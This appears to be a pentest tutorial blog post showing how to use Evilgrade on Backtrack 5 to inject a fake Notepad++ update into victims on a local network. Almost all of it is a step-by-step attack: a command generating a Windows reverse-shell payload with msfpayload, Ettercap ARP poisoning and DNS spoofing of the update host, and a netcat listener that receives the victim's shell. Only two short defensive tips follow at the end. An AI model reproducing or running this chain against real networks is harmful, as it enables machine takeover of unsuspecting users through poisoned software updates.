Type : Tutorial
Level : Medium, Advanced
What is Evilgrade?
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it’s own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.
From : http://www.infobytesec.com
2. Backtrack 5
1. Extract Evilgrade then run it using the command below
tar xvfz isr-evilgrade-2.0.0.tar.gz cd isr-evilgrade-2.0.0.tar.gz/ ./evilgrade
If there’s an error when you run the application, you can refer to my post about how to solve evilgrade error on Backtrack 5. below is the picture if you success run the application :
2. The next step is you need to determine the target of the application, because Evilgrade will create a fake update to inject the victim computer. To list all the supported application use
evilgrade>show modulesList of modules: =============== allmynotes amsn appleupdate apptapp apt atube autoit3 bbappworld blackberry bsplayer ccleaner clamwin cpan cygwin dap divxsuite express_talk fcleaner filezilla flashget flip4mac freerip getjar gom googleanalytics growl isopen istat itunes jet jetphoto linkedin miranda mirc nokia nokiasoftware notepadplus openoffice opera orbit osx paintnet panda_antirootkit photoscape quicktime skype sparkle speedbit sunbelt sunjava superantispyware teamviewer techtracker trillian ubertwitter vidbox virtualbox vmware winamp winscp winupdate winzip yahoomsn - 63 modules available.
In this tutorial we will targeting user who use Notepad Plus, so when they’re updating their application automatically it will caught in my trap. To use modules, simply run
3. To view the options that you can set up use command show options.
in the image above there’s VirtualHost that means when the victim update their notepad plus it will opening URL notepad-plus.sourceforge.net. later we will use this address.
4. The next step is setting an agent. I’m configuring this agent to create shell_reverse_tcp using msfpayload.
evilgrade(notepadplus)>set agent ’["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]’
/pentest/exploits/framework3/msfpayload –> We will load the msfpayload.
windows/shell_reverse_tcp –> We will use windows shell reverse tcp payload to open shell on target when operation succeeded.
LHOST –> localhost you backtrack 5 ip address / attacker ip address.
LPORT –> in which port you will interract with the victim when operation succedded. for further information about this you can refer to the readme file.
5. The next step is we need to start the evilgrade server. Make sure your port 80 is empty.
6. After finish setting up Evilgrade, we also need to configure the Man in the Middle attack using Ettercap, then redirect the connection to Evilgrade server when someone updating their notepad plus application. First step is you need to configure etter.dns .
notepad-plus.sourceforge.net –> this address we get from no.3.
7. For the next step we will use Ettercap
"Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis."From : http://ettercap.sourceforge.net/
To run Ettercap, open new terminal(Ctrl+Alt+T) run this command
Click Sniff –> Unified sniffing –> choose your network interface card, in this case I’m using eth0.
8. The next step we need to enable dns_spoof plugin this plugin used to redirect the request from victim to Evilgrade server. Click Plugins –> Manage the plugins –> Double click dns_spoof
9. The next step is scan hosts in our network, this step is to determine the target. Click Hosts –> Scan for hosts.
10. After listing all the hosts in the network, we need to set up the target.
11. We also need to perform Man in the middle attack to intercept all data on network. Click Mitm –> Arp poisoning –> check "Sniff remote connection".
12. After everything is set up correctly run the Ettercap to start sniffing.
13. The next step we will use NetCat to listen on port 1234 that we already defined before when setting up Evilgrade.
"Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities."
Open new terminal(Ctrl+Alt+T) and run this command
nc -l -v -p 1234
-l : to listen on any incoming connection
-v : verbose
-p : port to listen on
14. When the user opening their Notepad Plus application and the application asking for update application automatically like the picture below and user answer YES.
15. Our NetCat terminal will have something interesting because it’s already on victim shell.
1. It’s better to download directly from the source than automatically update the application 🙂
2. Always update your antivirus
Hope it helps 🙂